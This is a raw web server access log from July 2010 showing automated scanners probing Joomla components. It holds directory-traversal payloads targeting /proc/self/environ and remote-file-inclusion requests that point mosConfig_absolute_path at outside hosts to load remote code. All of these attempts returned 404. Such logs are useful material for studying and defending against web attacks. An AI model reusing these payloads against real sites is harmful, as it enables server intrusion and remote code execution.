99.198.108.74 - - [26/Jul/2010:11:31:12 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:11:31:12 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:11:31:13 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
222.124.193.12 - - [26/Jul/2010:11:31:55 +0200] "GET /logs/access_log//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:31:57 +0200] "GET //index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:31:58 +0200] "GET /logs//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:32:18 +0200] "GET /logs/access_log//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:32:20 +0200] "GET //index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:32:21 +0200] "GET /logs//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
91.121.7.123 - - [26/Jul/2010:11:35:12 +0200] "GET /logs/access_log/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:11:35:12 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:11:35:12 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
188.127.248.175 - - [26/Jul/2010:11:37:19 +0200] "GET /logs/access_log/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:11:37:19 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:11:37:19 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:11:37:34 +0200] "GET /logs/access_log/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:11:37:35 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:11:37:35 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
222.124.193.12 - - [26/Jul/2010:11:37:43 +0200] "GET /logs/access_log//index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:37:44 +0200] "GET //index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:37:46 +0200] "GET /logs//index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:38:28 +0200] "GET /logs/access_log//index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:38:33 +0200] "GET //index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:38:34 +0200] "GET /logs//index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
95.108.150.235 - - [26/Jul/2010:11:44:30 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)"
95.108.150.235 - - [26/Jul/2010:11:44:31 +0200] "GET / HTTP/1.1" 200 559 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)"
95.108.150.235 - - [26/Jul/2010:11:44:32 +0200] "GET / HTTP/1.1" 200 559 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)"
78.41.233.128 - - [26/Jul/2010:11:45:00 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:11:45:01 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
91.121.67.226 - - [26/Jul/2010:11:45:05 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:11:45:05 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
78.41.233.128 - - [26/Jul/2010:11:45:10 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:11:45:10 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:11:45:23 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:11:45:23 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:11:45:27 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:11:45:27 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:11:45:40 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:11:45:40 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
91.121.67.226 - - [26/Jul/2010:11:45:50 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
94.247.176.194 - - [26/Jul/2010:11:45:51 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:11:45:52 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
91.121.67.226 - - [26/Jul/2010:11:45:56 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:11:45:56 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
78.41.233.128 - - [26/Jul/2010:11:46:04 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:11:46:11 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:11:46:11 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:46:29 +0200] "GET /logs/access_log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:46:31 +0200] "GET //index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:46:32 +0200] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
91.121.67.226 - - [26/Jul/2010:11:46:37 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
99.198.108.74 - - [26/Jul/2010:11:46:48 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
78.41.233.128 - - [26/Jul/2010:11:46:55 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:11:46:55 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:11:48:39 +0200] "GET /logs/access_log/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:11:48:39 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:11:48:39 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:11:48:49 +0200] "GET /logs/access_log/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:11:48:49 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:11:48:49 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
91.121.67.226 - - [26/Jul/2010:11:49:46 +0200] "GET /logs/access_log/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:11:49:47 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:11:49:47 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
222.124.193.12 - - [26/Jul/2010:11:51:17 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:51:19 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:51:20 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:51:23 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:51:24 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:51:25 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:11:57:59 +0200] "GET /logs/access_log/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:11:57:59 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:11:57:59 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
110.45.144.106 - - [26/Jul/2010:11:58:28 +0200] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://polokodo.fileave.com/e107xmllfirfi.txt? HTTP/1.1" 404 338 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:11:59:25 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:11:59:40 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:03:09 +0200] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://polokodo.fileave.com/e107xmllfirfi.txt? HTTP/1.1" 404 338 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:03:47 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
66.7.221.56 - - [26/Jul/2010:12:05:59 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:06:04 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.834"
110.45.144.106 - - [26/Jul/2010:12:07:15 +0200] "GET /logs/access_log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:07:16 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:07:16 +0200] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
174.121.240.147 - - [26/Jul/2010:12:12:15 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.810"
174.121.240.147 - - [26/Jul/2010:12:13:52 +0200] "GET ///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
66.187.106.151 - - [26/Jul/2010:12:17:11 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.831"
174.121.240.147 - - [26/Jul/2010:12:17:16 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.810"
66.7.221.56 - - [26/Jul/2010:12:17:25 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:17:25 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:17:25 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:17:26 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:17:26 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:17:26 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.834"
81.21.78.22 - - [26/Jul/2010:12:20:18 +0200] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:12:20:18 +0200] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
81.208.34.38 - - [26/Jul/2010:12:21:13 +0200] "GET /akocomments.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
81.208.34.38 - - [26/Jul/2010:12:21:13 +0200] "GET /logs/akocomments.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 306 "-" "Mozilla/5.0"
81.208.34.38 - - [26/Jul/2010:12:21:14 +0200] "GET /logs/access_log%20%20/akocomments.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 319 "-" "Mozilla/5.0"
110.45.144.106 - - [26/Jul/2010:12:22:53 +0200] "GET /logs/access_log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://polokodo.fileave.com/e107xmllfirfi.txt? HTTP/1.1" 404 354 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:22:54 +0200] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://polokodo.fileave.com/e107xmllfirfi.txt? HTTP/1.1" 404 338 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:22:54 +0200] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://polokodo.fileave.com/e107xmllfirfi.txt? HTTP/1.1" 404 343 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:23:37 +0200] "GET /logs/access_log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://polokodo.fileave.com/e107xmllfirfi.txt? HTTP/1.1" 404 354 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:23:38 +0200] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://polokodo.fileave.com/e107xmllfirfi.txt? HTTP/1.1" 404 338 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:23:38 +0200] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://polokodo.fileave.com/e107xmllfirfi.txt? HTTP/1.1" 404 343 "-" "libwww-perl/5.79"
174.121.240.147 - - [26/Jul/2010:12:25:28 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.810"
174.121.240.147 - - [26/Jul/2010:12:25:28 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.810"
174.121.240.147 - - [26/Jul/2010:12:25:29 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.810"
110.45.144.106 - - [26/Jul/2010:12:26:16 +0200] "GET /logs/error_log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://polokodo.fileave.com/e107xmllfirfi.txt? HTTP/1.1" 404 353 "-" "libwww-perl/5.79"
81.208.34.38 - - [26/Jul/2010:12:34:36 +0200] "GET /akocomments.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
81.208.34.38 - - [26/Jul/2010:12:34:36 +0200] "GET /logs/akocomments.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 306 "-" "Mozilla/5.0"
81.208.34.38 - - [26/Jul/2010:12:34:44 +0200] "GET /logs/access_log%20%20/akocomments.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 319 "-" "Mozilla/5.0"
91.121.67.226 - - [26/Jul/2010:12:35:32 +0200] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
94.247.176.194 - - [26/Jul/2010:12:35:41 +0200] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:12:35:46 +0200] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:12:35:59 +0200] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:12:36:38 +0200] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:12:36:38 +0200] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
222.124.193.12 - - [26/Jul/2010:12:38:15 +0200] "GET /logs/access_log//index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:12:38:16 +0200] "GET //index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:12:38:17 +0200] "GET /logs//index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:12:39:35 +0200] "GET /logs/access_log/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:12:39:36 +0200] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:12:39:36 +0200] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
91.121.67.226 - - [26/Jul/2010:12:39:36 +0200] "GET /logs/access_log/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:12:39:36 +0200] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:12:39:37 +0200] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
99.198.108.74 - - [26/Jul/2010:12:41:04 +0200] "GET /logs/access_log/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:12:41:04 +0200] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:12:41:04 +0200] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
91.121.7.123 - - [26/Jul/2010:12:41:43 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
78.41.233.128 - - [26/Jul/2010:12:42:07 +0200] "GET /logs/access_log/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:12:42:07 +0200] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:12:42:08 +0200] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
188.127.248.175 - - [26/Jul/2010:12:42:19 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:12:42:19 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
66.7.221.56 - - [26/Jul/2010:12:42:39 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:42:40 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.834"
193.43.92.192 - - [26/Jul/2010:12:42:56 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.836"
